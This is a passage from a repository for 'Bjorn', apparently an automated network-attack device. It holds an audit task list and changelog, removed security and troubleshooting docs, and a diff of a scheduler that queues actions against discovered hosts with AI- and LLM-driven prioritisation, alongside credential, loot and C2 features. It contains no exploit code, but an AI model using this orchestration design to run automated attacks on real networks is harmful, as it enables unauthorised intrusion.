### BT-03: Race condition on bt.json `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:200-216`
- **Issue:** Read-modify-write on shared file without locking
- **Fix:** Add `threading.Lock` for bt.json access, use atomic write pattern
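The lock plus atomic-write pattern referenced in the fix (a sketch with a hypothetical function name):

```python
import json, os, tempfile, threading

_bt_lock = threading.Lock()

def update_bt_json(path: str, updates: dict) -> dict:
    """Read-modify-write under a lock; write a temp file, then rename it into place atomically."""
    with _bt_lock:
        try:
            with open(path) as f:
                data = json.load(f)
        except (FileNotFoundError, ValueError):
            data = {}
        data.update(updates)
        fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".")
        with os.fdopen(fd, "w") as f:
            json.dump(data, f)
        os.replace(tmp, path)  # atomic on POSIX: readers never see a partial file
    return data
```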
### BT-04: auto_bt_connect service crash `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:219`
- **Issue:** `subprocess.run(..., check=True)` raises CalledProcessError if service missing
- **Fix:** Use `check=False` and log warning instead of crashing
---
## P0 — Web Server Fixes
### WEB-01: SSE reconnect counter reset bug `[DONE]`
- **File:** `web/js/core/console-sse.js:367`
- **Issue:** `reconnectCount = 0` on every message — a single flaky message resets counter,
enabling infinite reconnect loops
- **Fix:** Only reset counter after sustained healthy connection (e.g., 5+ messages)
### WEB-02: Silent routes list has trailing empty string `[DONE]`
- **File:** `webapp.py:474`
- **Issue:** Empty string `""` in `silent_routes` matches ALL log messages
- **Fix:** Remove empty string from list
---
## P1 — Stability & Consistency
### STAB-01: Uniform error handling pattern `[DONE]`
- **Files:** All `web_utils/*.py`
- **Issue:** Mix of bare `except:`, `except Exception`, inconsistent error response format
- **Fix:** Establish `_json_response(handler, data, status)` helper; catch specific exceptions
### STAB-02: Add pagination to heavy API endpoints `[DONE]`
- **Files:** `web_utils/netkb_utils.py`, `web_utils/orchestrator_utils.py`
- **Endpoints:** `/netkb_data`, `/list_credentials`, `/network_data`
- **Fix:** Accept `?page=N&per_page=M` query params, return `{data, total, page, pages}`
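The envelope can be produced by a small helper like this (a sketch; the real endpoints paginate at the SQL level rather than slicing in memory):

```python
import math

def paginate(rows, page=1, per_page=50, max_per_page=500):
    """Slice a result set into the {data, total, page, pages} envelope.

    Clamps inputs so ?page=0 or an absurd per_page cannot blow up memory.
    """
    per_page = max(1, min(int(per_page), max_per_page))
    total = len(rows)
    pages = max(1, math.ceil(total / per_page))
    page = max(1, min(int(page), pages))
    start = (page - 1) * per_page
    return {
        "data": rows[start:start + per_page],
        "total": total,
        "page": page,
        "pages": pages,
    }
```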
### STAB-03: Dead routes & unmounted pages `[DONE]`
- **Files:** `web/js/app.js`, various
- **Issue:** GPS UI elements with no backend, rl-dashboard not mounted, zombieland incomplete
- **Fix:** Remove GPS placeholder, wire rl-dashboard mount, mark zombieland as beta
### STAB-04: Missing constants for magic numbers `[DONE]`
- **Files:** `web_utils/bluetooth_utils.py`, `webapp.py`
- **Fix:** Extract timeout values, pool sizes, size limits to named constants
---
## P2 — Web SPA Quality
### SPA-01: Review & fix dashboard.js `[DONE]`
- Check stat polling, null safety, error display
### SPA-02: Review & fix network.js `[DONE]`
- D3 graph cleanup on unmount, memory leak check
### SPA-03: Review & fix credentials.js `[DONE]`
- Search/filter robustness, export edge cases
### SPA-04: Review & fix vulnerabilities.js `[DONE]`
- CVE modal error handling, feed sync status
### SPA-05: Review & fix files.js `[DONE]`
- Upload progress, drag-drop edge cases, path validation
### SPA-06: Review & fix netkb.js `[DONE]`
- View mode transitions, filter persistence, pagination integration
### SPA-07: Review & fix web-enum.js `[DONE]`
- Status code filter, date range, export completeness
### SPA-08: Review & fix rl-dashboard.js `[DONE]`
- Canvas cleanup, mount lifecycle, null data handling
### SPA-09: Review & fix zombieland.js (C2) `[DONE]`
- SSE lifecycle, agent list refresh, mark as experimental
### SPA-10: Review & fix scripts.js `[DONE]`
- Output polling cleanup, project upload validation
### SPA-11: Review & fix attacks.js `[DONE]`
- Tab switching, image upload validation
### SPA-12: Review & fix bjorn.js (EPD viewer) `[DONE]`
- Image refresh, zoom controls, null EPD state
### SPA-13: Review & fix settings-config.js `[DONE]`
- Form generation edge cases, chip editor validation
### SPA-14: Review & fix actions-studio.js `[DONE]`
- Canvas lifecycle, node dragging, edge persistence
---
## P2 — AI/Cortex Improvements
### AI-01: Feature selection / importance analysis `[DONE]`
- Variance-based feature filtering in data consolidator (drops near-zero variance features)
- Feature manifest exported alongside training data
- `get_feature_importance()` method on FeatureLogger for introspection
- Config: `ai_feature_selection_min_variance` (default 0.001)
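The variance filter amounts to dropping columns whose population variance falls below the configured floor (a sketch mirroring `ai_feature_selection_min_variance`; the real consolidator works on its own data structures):

```python
from statistics import pvariance

def select_features(rows, feature_names, min_variance=0.001):
    """Drop near-constant features before training.

    rows: list of equal-length numeric feature vectors.
    Returns the surviving names and the filtered vectors.
    """
    keep = [
        i for i, name in enumerate(feature_names)
        if pvariance([row[i] for row in rows]) >= min_variance
    ]
    kept_names = [feature_names[i] for i in keep]
    filtered = [[row[i] for i in keep] for row in rows]
    return kept_names, filtered
```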
### AI-02: Continuous reward shaping `[DONE]`
- Extended reward function with 4 new components: novelty bonus, repeat penalty,
diminishing returns, partial credit for long-running failed actions
- Helper methods to query attempt counts and consecutive failures from ml_features
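The four components combine roughly like this (illustrative coefficients only; the real weights live in the orchestrator):

```python
def shape_reward(base, attempts, consecutive_failures, duration_s,
                 novelty_bonus=0.2, repeat_penalty=0.05,
                 partial_credit_after_s=60.0):
    """Blend the base reward with the four shaping components.

    attempts counts prior tries of this action against the same host
    (queried from ml_features); consecutive_failures is the current
    failure streak.
    """
    reward = base
    if attempts == 0:
        reward += novelty_bonus                        # never tried on this host
    reward -= repeat_penalty * max(0, attempts - 1)    # diminishing returns
    if base < 0 and duration_s >= partial_credit_after_s:
        reward += 0.1                                  # partial credit: it ran long
    reward -= 0.02 * consecutive_failures              # repeat-failure penalty
    return reward
```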
### AI-03: Model versioning & rollback `[DONE]`
- Keep up to 3 model versions on disk (configurable)
- Model history tracking: version, loaded_at, accuracy, avg_reward
- `rollback_model()` method to load previous version
- Auto-rollback if average reward drops below previous model after 50 decisions
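The version bookkeeping can be modeled with a small in-memory class (a sketch; the real `ai_engine.py` also reloads weight files from disk):

```python
class ModelHistory:
    """Keep the last N model versions and support rollback.

    Entries record version id and avg_reward; rollback() returns the
    previous version's id so the caller can reload those weights.
    """
    def __init__(self, max_versions=3):
        self.max_versions = max_versions
        self.history = []              # newest last

    def register(self, version, avg_reward):
        self.history.append({"version": version, "avg_reward": avg_reward})
        self.history = self.history[-self.max_versions:]

    def rollback(self):
        if len(self.history) < 2:
            return None
        self.history.pop()             # drop the current (bad) model
        return self.history[-1]["version"]

    def should_auto_rollback(self, current_avg_reward):
        if len(self.history) < 2:
            return False
        return current_avg_reward < self.history[-2]["avg_reward"]
```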
### AI-04: Low-data cold-start bootstrap `[DONE]`
- Bootstrap scores dict accumulating per (action_name, port_profile) running averages
- Blended heuristic/bootstrap scoring (40-80% weight based on sample count)
- Persistent `ai_bootstrap_scores.json` across restarts
- Config: `ai_cold_start_bootstrap_weight` (default 0.6)
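The blended scoring can be sketched as a linear ramp of the bootstrap weight from 40% to 80% as samples accumulate (an illustrative curve; the exact ramp in `ai_engine.py` may differ):

```python
def blended_score(heuristic, bootstrap_avg, samples,
                  min_w=0.4, max_w=0.8, full_at=20):
    """Blend a static heuristic score with a learned bootstrap average.

    With no samples, fall back to the heuristic alone; the bootstrap
    weight then grows linearly from min_w to max_w as samples reach
    full_at, mirroring the 40-80% weighting described above.
    """
    if samples <= 0 or bootstrap_avg is None:
        return heuristic
    ramp = min(1.0, samples / full_at)
    w = min_w + (max_w - min_w) * ramp
    return (1 - w) * heuristic + w * bootstrap_avg
```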
---
## P3 — Future Features
### EPD-01: Multi-size EPD layout engine `[DONE]`
- New `display_layout.py` module with `DisplayLayout` class
- JSON layout definitions per EPD type (2.13", 2.7")
- Element-based positioning: each UI component has named anchor `{x, y, w, h}`
- Custom layouts stored in `resources/layouts/{epd_type}.json`
- `px()`/`py()` scaling preserved, layout provides reference coordinates
- Integrated into `display.py` rendering pipeline
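The anchor lookup idea reduces to a dict of named rectangles with an optional JSON override (a sketch of the `DisplayLayout` concept; element names and coordinates below are invented for illustration):

```python
import json

class DisplayLayout:
    """Resolve named element anchors for a given EPD type.

    Layouts are plain dicts of {name: {x, y, w, h}}; a custom JSON file
    under resources/layouts/ overrides the built-in defaults.
    """
    BUILTIN = {
        "epd2in13": {"battery": {"x": 210, "y": 2, "w": 38, "h": 12}},
        "epd2in7":  {"battery": {"x": 220, "y": 4, "w": 40, "h": 14}},
    }

    def __init__(self, epd_type, custom_path=None):
        self.elements = dict(self.BUILTIN.get(epd_type, {}))
        if custom_path:
            try:
                with open(custom_path, "r", encoding="utf-8") as f:
                    self.elements.update(json.load(f))
            except (OSError, json.JSONDecodeError):
                pass  # fall back to the built-in layout

    def anchor(self, name, default=None):
        return self.elements.get(name, default)
```

Rendering code then asks the layout for reference coordinates and applies its existing `px()`/`py()` scaling on top.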
### EPD-02: Web-based EPD layout editor `[DONE]`
- Backend API: `GET/POST /api/epd/layout`, `POST /api/epd/layout/reset`
- `GET /api/epd/layouts` lists all supported EPD types and their layouts
- `GET /api/epd/layout?epd_type=X` to fetch layout for a specific EPD type
- Frontend editor: `web/js/core/epd-editor.js` — 4th tab in attacks page
- SVG canvas with drag-and-drop element positioning and corner resize handles
- Display mode preview: Color, NB (black-on-white), BN (white-on-black)
- Grid/snap, zoom (50-600%), toggleable element labels
- Add/delete elements, import/export layout JSON
- Properties panel with x/y/w/h editors, font size editors
- Undo system (50-deep snapshot stack, Ctrl+Z)
- Color-coded elements by type (icons=blue, text=green, bars=orange, etc.)
- Transparency-aware checkerboard canvas background
- Arrow key nudge, keyboard shortcuts
### ORCH-01: Per-action circuit breaker `[DONE]`
- New `action_circuit_breaker` DB table: failure_streak, circuit_status, cooldown_until
- Three states: closed → open (after N fails) → half_open (after cooldown)
- Exponential backoff: `min(2^streak * 60, 3600)` seconds
- Integrated into `_should_queue_action()` check
- Success on half-open resets circuit, failure re-opens with longer cooldown
- Config: `circuit_breaker_threshold` (default 3)
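The three-state machine and backoff formula can be sketched in memory like this (the real state lives in the `action_circuit_breaker` SQLite table so it survives restarts):

```python
import time

THRESHOLD = 3          # circuit_breaker_threshold default

def cooldown_seconds(streak):
    """Exponential backoff: min(2^streak * 60, 3600) seconds."""
    return min(2 ** streak * 60, 3600)

class CircuitBreaker:
    """closed -> open (after THRESHOLD fails) -> half_open (after cooldown)."""
    def __init__(self, now=time.time):
        self.now = now
        self.streak = 0
        self.status = "closed"
        self.cooldown_until = 0.0

    def allow(self):
        if self.status == "open" and self.now() >= self.cooldown_until:
            self.status = "half_open"       # let one probe through
        return self.status in ("closed", "half_open")

    def record(self, success):
        if success:
            self.streak = 0
            self.status = "closed"          # probe succeeded: reset
            return
        self.streak += 1
        if self.streak >= THRESHOLD or self.status == "half_open":
            self.status = "open"            # re-open with longer cooldown
            self.cooldown_until = self.now() + cooldown_seconds(self.streak)
```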
### ORCH-02: Global concurrency limiter `[DONE]`
- DB-backed running action count check before scheduling
- `count_running_actions()` method in queue.py
- Per-action `max_concurrent` support in requirements evaluator
- Respects `semaphore_slots` config (default 5)
### ORCH-03: Manual mode with active scanning `[DONE]`
- Background scan timer thread in MANUAL mode
- NetworkScanner runs at `manual_mode_scan_interval` (default 180s)
- Config: `manual_mode_auto_scan` (default True)
- Scan timer auto-stops when switching back to AUTO/AI
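The interruptible scan loop follows a standard `threading.Event` pattern (a sketch; `scan_fn` stands in for NetworkScanner and the class name is hypothetical):

```python
import threading

class ManualScanTimer:
    """Background scan loop for MANUAL mode; stops cleanly on mode switch."""
    def __init__(self, scan_fn, interval=180.0):
        self.scan_fn = scan_fn
        self.interval = interval        # manual_mode_scan_interval
        self._stop = threading.Event()
        self._thread = None

    def start(self):
        self._stop.clear()
        self._thread = threading.Thread(target=self._loop, daemon=True)
        self._thread.start()

    def _loop(self):
        while not self._stop.is_set():
            self.scan_fn()
            if self._stop.wait(self.interval):   # interruptible sleep
                break

    def stop(self):
        """Called when switching back to AUTO/AI."""
        self._stop.set()
        if self._thread:
            self._thread.join(timeout=5)
```

Using `Event.wait()` instead of `time.sleep()` means a mode switch interrupts the sleep immediately rather than after up to 180 s.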
---
## Changelog
### 2026-03-12 — Security & Stability Audit
#### Security
- **[SEC-01]** Replaced all `shell=True` subprocess calls with safe argument lists
- **[SEC-02]** Added MAC address validation (regex) in DELETE route handler
- **[SEC-03]** Strengthened path validation using `os.path.realpath()` + dedicated helper
- **[BT-01]** Replaced bare `except:` with specific exception handling + logging
- **[BT-02]** Added null address validation in Bluetooth route lambdas and method entry points
- **[BT-03]** Added file lock for bt.json read/write operations
- **[BT-04]** Changed auto_bt_connect restart to non-fatal (check=False)
- **[SEC-04]** Cortex config files: placeholder secrets + WARNING field, already gitignored
- **[SEC-05]** Added JWT auth to Cortex WebSocket `/ws/logs` endpoint
- **[SEC-06]** Cortex device API auth now required by default, CORS configurable via env var
#### Bug Fixes
- **[WEB-01]** Fixed SSE reconnect counter: only resets after 5+ consecutive healthy messages
- **[WEB-02]** Removed empty string from silent_routes that was suppressing all log messages
- **[STAB-03]** Cleaned up dead GPS UI references, wired rl-dashboard mount
- **[ORCH-BUG]** Fixed Auto→Manual mode switch not resetting status to IDLE (4-location fix):
- `orchestrator.py`: Reset all status fields after main loop exit AND after action completes with exit flag
- `Bjorn.py`: Reset status even when `thread.join(10)` times out
- `orchestrator_utils.py`: Explicit IDLE reset in web API stop handler
#### Quality
- **[STAB-01]** Standardized error handling across web_utils modules
- **[STAB-04]** Extracted magic numbers to named constants
#### SPA Page Review (SPA-01..14)
All 18 SPA page modules reviewed and fixed:
**Pages fully rewritten (11 pages):**
- **dashboard.js** — New layout with ResourceTracker, safe DOM (no innerHTML), visibility-aware pollers, proper uptime ticker cleanup
- **network.js** — D3 force graph cleanup on unmount, lazy d3 loading, search debounce tracked, simulation stop
- **credentials.js** — AbortController tracked, toast timer tracked, proper state reset in unmount
- **vulnerabilities.js** — ResourceTracker integration, abort controllers, null safety throughout
- **files.js** — Upload progress, drag-drop safety, ResourceTracker lifecycle
- **netkb.js** — View mode persistence, filter tracked, pagination integration
- **web-enum.js** — Status filter, date range, tracked pollers and timeouts
- **rl-dashboard.js** — Canvas cleanup, chart lifecycle, null data guards
- **zombieland.js** — SSE lifecycle tracked, agent list cleanup, experimental flag
- **attacks.js** — Tab switching, ResourceTracker integration, proper cleanup
- **bjorn.js** — Image refresh tracked, zoom controls, null EPD state handling
**Pages with targeted fixes (7 pages):**
- **bjorn-debug.js** — Fixed 3 button event listeners using raw `addEventListener` → `tracker.trackEventListener` (memory leak)
- **scheduler.js** — Added `searchDeb` timeout cleanup + state reset in unmount (zombie timer)
- **actions.js** — Added resize debounce cleanup in unmount + tracked `highlightPane` timeout (zombie timer)
- **backup.js** — Already clean: ResourceTracker, sidebar layout cleanup, state reset (no changes needed)
- **database.js** — Already clean: search debounce cleanup, sidebar layout, Poller lifecycle (no changes needed)
- **loot.js** — Already clean: search timer cleanup, ResourceTracker, state reset (no changes needed)
- **actions-studio.js** — Already clean: runtime cleanup function, ResourceTracker (no changes needed)
#### AI Pipeline (AI-01..04)
- **[AI-01]** Feature selection: variance-based filtering in `data_consolidator.py`, feature manifest export, `get_feature_importance()` in `feature_logger.py`
- **[AI-02]** Continuous reward shaping in `orchestrator.py`: novelty bonus, diminishing returns penalty, partial credit for long-running failures, attempt/streak DB queries
- **[AI-03]** Model versioning in `ai_engine.py`: 3-model history, `rollback_model()`, auto-rollback after 50 decisions if avg reward drops
- **[AI-04]** Cold-start bootstrap in `ai_engine.py`: persistent `ai_bootstrap_scores.json`, blended heuristic/bootstrap scoring with adaptive weighting
#### Orchestrator (ORCH-01..03)
- **[ORCH-01]** Circuit breaker: new `action_circuit_breaker` DB table in `db_utils/queue.py`, 3-state machine (closed→open→half-open), exponential backoff `min(2^N*60, 3600)s`, integrated into `action_scheduler.py` scheduling decisions and `orchestrator.py` post-execution
- **[ORCH-02]** Global concurrency limiter: `count_running_actions()` in `db_utils/queue.py`, pre-schedule check in `action_scheduler.py` against `semaphore_slots` config
- **[ORCH-03]** Manual mode scanning: background `_scan_loop` thread in `orchestrator_utils.py`, runs at `manual_mode_scan_interval` (180s default), auto-stops on mode switch
#### EPD Multi-Size (EPD-01..02)
- **[EPD-01]** New `display_layout.py` module: `DisplayLayout` class with JSON-based element positioning, built-in layouts for 2.13" and 2.7" displays, custom layout override via `resources/layouts/`, 20+ elements integrated into `display.py` rendering pipeline
- **[EPD-02]** Backend API: `GET/POST /api/epd/layout`, `POST /api/epd/layout/reset`, `GET /api/epd/layouts` — endpoints in `web_utils/system_utils.py`, routes in `webapp.py`
- **[EPD-02]** Frontend editor: `web/js/core/epd-editor.js` as 4th tab in attacks page — SVG drag-and-drop canvas, resize handles, Color/NB/BN display modes, grid/snap/zoom, add/delete elements, import/export JSON, undo stack, font size editing, arrow key nudge
#### New Configuration Parameters
- `ai_feature_selection_min_variance` (0.001) — minimum variance for feature inclusion
- `ai_model_history_max` (3) — max model versions kept on disk
- `ai_auto_rollback_window` (50) — decisions before auto-rollback evaluation
- `ai_cold_start_bootstrap_weight` (0.6) — bootstrap vs static heuristic weight
- `circuit_breaker_threshold` (3) — consecutive failures to open circuit
- `manual_mode_auto_scan` (true) — auto-scan in MANUAL mode
- `manual_mode_scan_interval` (180) — seconds between manual mode scans


@@ -1,48 +0,0 @@
# 🔒 Security Policy
This document describes the security policy for the **Bjorn** repository: supported versions, security practices, and how to report vulnerabilities.
## 🧮 Supported Versions
We provide security updates for the following versions of our project:
| Version | Status | Secure |
| ------- |-------------| ------ |
| 1.0.0 | Development | No |
## 🛡️ Security Practices
- We follow best practices for secure coding and infrastructure management.
- Regular security audits and code reviews are conducted to identify and mitigate potential risks.
- Dependencies are monitored and updated to address known vulnerabilities.
## 📲 Security Updates
- Security updates are released as soon as possible after a vulnerability is confirmed.
- Users are encouraged to update to the latest version to benefit from security fixes.
## 🚨 Reporting a Vulnerability
If you discover a security vulnerability within this project, please follow these steps:
1. **Do not create a public issue.** Instead, contact us directly to responsibly disclose the vulnerability.
2. **Email** [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com) with the following information:
- A description of the vulnerability.
- Steps to reproduce the issue.
- Any potential impact or severity.
3. **Wait for a response.** We will acknowledge your report and work with you to address the issue promptly.
## 🛰️ Additional Resources
- [OWASP Security Guidelines](https://owasp.org/)
Thank you for helping us keep this project secure!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.


@@ -1,80 +0,0 @@
# 🐛 Known Issues and Troubleshooting
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Current Development Issues](#-current-development-issues)
- [Troubleshooting Steps](#-troubleshooting-steps)
- [License](#-license)
## 🪲 Current Development Issues
### Long Runtime Issue
- **Problem**: `OSError: [Errno 24] Too many open files`
- **Status**: Partially resolved with system limits configuration.
- **Workaround**: Implemented file descriptor limits increase.
- **Monitoring**: Check open files with `lsof -p $(pgrep -f Bjorn.py) | wc -l`
- The logs currently report the open file descriptor count periodically as `(FD: XXX)`
## 🛠️ Troubleshooting Steps
### Service Issues
```bash
# Follow the bjorn service journal
journalctl -fu bjorn.service
# Check service status
sudo systemctl status bjorn.service
# Or tail the application logs directly
sudo tail -f /home/bjorn/Bjorn/data/logs/*
# Check port 8000 usage
sudo lsof -i :8000
```
### Display Issues
```bash
# Verify SPI devices
ls /dev/spi*
# Add the bjorn user to the spi and gpio groups
sudo usermod -a -G spi,gpio bjorn
```
### Network Issues
```bash
# Check network interfaces
ip addr show
# Test USB gadget interface
ip link show usb0
```
### Permission Issues
```bash
# Fix ownership
sudo chown -R bjorn:bjorn /home/bjorn/Bjorn
# Fix permissions
sudo chmod -R 755 /home/bjorn/Bjorn
```
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.


@@ -1,4 +1,4 @@
# action_scheduler.py
# Smart Action Scheduler for Bjorn - queue-only implementation
# Handles trigger evaluation, requirements checking, and queue management.
#
@@ -24,6 +24,7 @@ from typing import Any, Dict, List, Optional, Tuple
from init_shared import shared_data
from logger import Logger
from ai_engine import get_or_create_ai_engine
logger = Logger(name="action_scheduler.py")
@@ -73,6 +74,8 @@ class ActionScheduler:
# Runtime flags
self.running = True
self.check_interval = 5 # seconds between iterations
self._stop_event = threading.Event()
self._error_backoff = 1.0
# Action definition cache
self._action_definitions: Dict[str, Dict[str, Any]] = {}
@@ -85,6 +88,22 @@ class ActionScheduler:
self._last_source_is_studio: Optional[bool] = None
# Enforce DB invariants (idempotent)
self._ensure_db_invariants()
# Throttling for priorities
self._last_priority_update = 0.0
self._priority_update_interval = 60.0 # seconds
# Initialize AI engine for recommendations ONLY in AI mode.
# Uses singleton so model weights are loaded only once across the process.
self.ai_engine = None
if self.shared_data.operation_mode == "AI":
self.ai_engine = get_or_create_ai_engine(self.shared_data)
if self.ai_engine is None:
logger.info_throttled(
"AI engine unavailable in scheduler; continuing heuristic-only",
key="scheduler_ai_init_failed",
interval_s=300.0,
)
logger.info("ActionScheduler initialized")
@@ -95,40 +114,320 @@ class ActionScheduler:
logger.info("ActionScheduler starting main loop")
while self.running and not self.shared_data.orchestrator_should_exit:
try:
# If the user toggles AI mode at runtime, enable/disable AI engine without restart.
if self.shared_data.operation_mode == "AI" and self.ai_engine is None:
self.ai_engine = get_or_create_ai_engine(self.shared_data)
if self.ai_engine:
logger.info("Scheduler: AI engine enabled (singleton)")
else:
logger.info_throttled(
"Scheduler: AI engine unavailable; staying heuristic-only",
key="scheduler_ai_enable_failed",
interval_s=300.0,
)
elif self.shared_data.operation_mode != "AI" and self.ai_engine is not None:
self.ai_engine = None
# Refresh action cache if needed
self._refresh_cache_if_needed()
# Keep queue consistent with current enable/disable flags.
self._cancel_queued_disabled_actions()
# 1) Promote scheduled actions that are due
# 1) Promote scheduled actions that are due (always — queue hygiene)
self._promote_scheduled_to_pending()
# 2) Publish next scheduled occurrences for interval actions
self._publish_all_upcoming()
# When LLM autonomous mode owns scheduling, skip trigger evaluation
# so it doesn't compete with or duplicate LLM decisions.
# BUT: if the queue is empty, the heuristic scheduler resumes as fallback
# to prevent deadlock when the LLM fails to produce valid actions.
_llm_wants_skip = bool(
self.shared_data.config.get("llm_orchestrator_skip_scheduler", False)
and self.shared_data.config.get("llm_orchestrator_mode") == "autonomous"
and self.shared_data.config.get("llm_enabled", False)
)
_queue_empty = False
if _llm_wants_skip:
try:
row = self.shared_data.db.query_one(
"SELECT COUNT(*) AS cnt FROM action_queue WHERE status IN ('pending','running','scheduled')"
)
_queue_empty = (row and int(row["cnt"]) == 0)
except Exception:
pass
_llm_skip = _llm_wants_skip and not _queue_empty
# 3) Evaluate global on_start actions
self._evaluate_global_actions()
if not _llm_skip:
if _llm_wants_skip and _queue_empty:
logger.info("Scheduler: LLM queue empty — heuristic fallback active")
# 2) Publish next scheduled occurrences for interval actions
self._publish_all_upcoming()
# 4) Evaluate per-host triggers
self.evaluate_all_triggers()
# 3) Evaluate global on_start actions
self._evaluate_global_actions()
# 5) Queue maintenance
# 4) Evaluate per-host triggers
self.evaluate_all_triggers()
else:
logger.debug("Scheduler: trigger evaluation skipped (LLM autonomous owns scheduling)")
# 5) Queue maintenance (always — starvation prevention + cleanup)
self.cleanup_queue()
self.update_priorities()
time.sleep(self.check_interval)
self._error_backoff = 1.0
if self._stop_event.wait(self.check_interval):
break
except Exception as e:
logger.error(f"Error in scheduler loop: {e}")
time.sleep(self.check_interval)
if self._stop_event.wait(self._error_backoff):
break
self._error_backoff = min(self._error_backoff * 2.0, 15.0)
logger.info("ActionScheduler stopped")
# ----------------------------------------------------------------- priorities
def update_priorities(self):
"""
Update priorities of pending actions.
1. Increase priority over time (starvation prevention) with MIN(100) cap.
2. [AI Mode] Boost priority of actions recommended by AI engine.
"""
now = time.time()
if now - self._last_priority_update < self._priority_update_interval:
return
try:
# 1. Anti-starvation aging: +1 per minute for actions waiting >1 hour.
# julianday is portable across all SQLite builds.
# MIN(100) cap prevents unbounded priority inflation.
affected = self.db.execute(
"""
UPDATE action_queue
SET priority = MIN(100, priority + 1)
WHERE status='pending'
AND julianday('now') - julianday(created_at) > 0.0417
"""
)
self._last_priority_update = now
if affected and affected > 0:
logger.debug(f"Aged {affected} pending actions in queue")
# 2. AI Recommendation Boost
if self.shared_data.operation_mode == "AI" and self.ai_engine:
self._apply_ai_priority_boost()
elif self.shared_data.operation_mode == "AI" and not self.ai_engine:
logger.warning("Operation mode is AI, but ai_engine is not initialized!")
except Exception as e:
logger.error(f"Failed to update priorities: {e}")
def _apply_ai_priority_boost(self):
"""Boost priority of actions recommended by AI engine."""
try:
if not self.ai_engine:
logger.warning("AI Boost skipped: ai_engine is None")
return
# Get list of unique hosts with pending actions
hosts = self.db.query("""
SELECT DISTINCT mac_address FROM action_queue
WHERE status='pending'
""")
if not hosts:
return
for row in hosts:
mac = row['mac_address']
if not mac:
continue
# Get available actions for this host
available = [
r['action_name'] for r in self.db.query("""
SELECT DISTINCT action_name FROM action_queue
WHERE mac_address=? AND status='pending'
""", (mac,))
]
if not available:
continue
# Get host context
host_data = self.db.get_host_by_mac(mac)
if not host_data:
continue
context = {
'mac': mac,
'hostname': (host_data.get('hostnames') or '').split(';')[0],
'ports': [
int(p) for p in (host_data.get('ports') or '').split(';')
if p.isdigit()
]
}
# Ask AI for recommendation
recommended_action, confidence, debug = self.ai_engine.choose_action(
host_context=context,
available_actions=available,
exploration_rate=0.0 # No exploration in scheduler
)
if not isinstance(debug, dict):
debug = {}
threshold = self._get_ai_confirm_threshold()
if recommended_action and confidence >= threshold: # Only boost if confident
# Boost recommended action
boost_amount = int(20 * confidence) # Scale boost by confidence
affected = self.db.execute("""
UPDATE action_queue
SET priority = priority + ?
WHERE mac_address=? AND action_name=? AND status='pending'
""", (boost_amount, mac, recommended_action))
if affected and affected > 0:
# NEW: Update metadata to reflect AI influence
try:
# We fetch all matching IDs to update their metadata
rows = self.db.query("""
SELECT id, metadata FROM action_queue
WHERE mac_address=? AND action_name=? AND status='pending'
""", (mac, recommended_action))
for row in rows:
meta = json.loads(row['metadata'] or '{}')
meta['decision_method'] = f"ai_boosted ({debug.get('method', 'unknown')})"
meta['decision_origin'] = "ai_boosted"
meta['decision_scope'] = "priority_boost"
meta['ai_confidence'] = confidence
meta['ai_threshold'] = threshold
meta['ai_method'] = str(debug.get('method', 'unknown'))
meta['ai_recommended_action'] = recommended_action
meta['ai_model_loaded'] = bool(getattr(self.ai_engine, "model_loaded", False))
meta['ai_reason'] = "priority_boost_applied"
meta['ai_debug'] = debug # Includes all_scores and input_vector
self.db.execute("UPDATE action_queue SET metadata=? WHERE id=?",
(json.dumps(meta), row['id']))
except Exception as meta_e:
logger.error(f"Failed to update metadata for AI boost: {meta_e}")
logger.info(
f"[AI_BOOST] action={recommended_action} mac={mac} boost={boost_amount} "
f"conf={float(confidence):.2f} thr={float(threshold):.2f} "
f"method={debug.get('method', 'unknown')}"
)
except Exception as e:
logger.error(f"Error applying AI priority boost: {e}")
def stop(self):
"""Stop the scheduler."""
logger.info("Stopping ActionScheduler...")
self.running = False
self._stop_event.set()
# --------------------------------------------------------------- definitions
def _get_ai_confirm_threshold(self) -> float:
"""Return normalized AI confirmation threshold in [0.0, 1.0]."""
try:
raw = float(getattr(self.shared_data, "ai_confirm_threshold", 0.3))
except Exception:
raw = 0.3
return max(0.0, min(1.0, raw))
def _annotate_decision_metadata(
self,
metadata: Dict[str, Any],
action_name: str,
context: Dict[str, Any],
decision_scope: str,
) -> None:
"""
Fill metadata with a consistent decision trace:
decision_method/origin + AI method/confidence/threshold/reason.
"""
metadata.setdefault("decision_method", "heuristic")
metadata.setdefault("decision_origin", "heuristic")
metadata["decision_scope"] = decision_scope
threshold = self._get_ai_confirm_threshold()
metadata["ai_threshold"] = threshold
if self.shared_data.operation_mode != "AI":
metadata["ai_reason"] = "ai_mode_disabled"
return
if not self.ai_engine:
metadata["ai_reason"] = "ai_engine_unavailable"
return
try:
recommended, confidence, debug = self.ai_engine.choose_action(
host_context=context,
available_actions=[action_name],
exploration_rate=0.0,
)
ai_method = str((debug or {}).get("method", "unknown"))
confidence_f = float(confidence or 0.0)
model_loaded = bool(getattr(self.ai_engine, "model_loaded", False))
metadata["ai_method"] = ai_method
metadata["ai_confidence"] = confidence_f
metadata["ai_recommended_action"] = recommended or ""
metadata["ai_model_loaded"] = model_loaded
if recommended == action_name and confidence_f >= threshold:
metadata["decision_method"] = f"ai_confirmed ({ai_method})"
metadata["decision_origin"] = "ai_confirmed"
metadata["ai_reason"] = "recommended_above_threshold"
elif recommended != action_name:
metadata["decision_origin"] = "heuristic"
metadata["ai_reason"] = "recommended_different_action"
else:
metadata["decision_origin"] = "heuristic"
metadata["ai_reason"] = "confidence_below_threshold"
except Exception as e:
metadata["ai_reason"] = "ai_check_failed"
logger.debug(f"AI decision annotation failed for {action_name}: {e}")
def _log_queue_decision(
self,
action_name: str,
mac: str,
metadata: Dict[str, Any],
target_port: Optional[int] = None,
target_service: Optional[str] = None,
) -> None:
"""Emit a compact, explicit queue-decision log line."""
decision = str(metadata.get("decision_method", "heuristic"))
origin = str(metadata.get("decision_origin", "heuristic"))
ai_method = str(metadata.get("ai_method", "n/a"))
ai_reason = str(metadata.get("ai_reason", "n/a"))
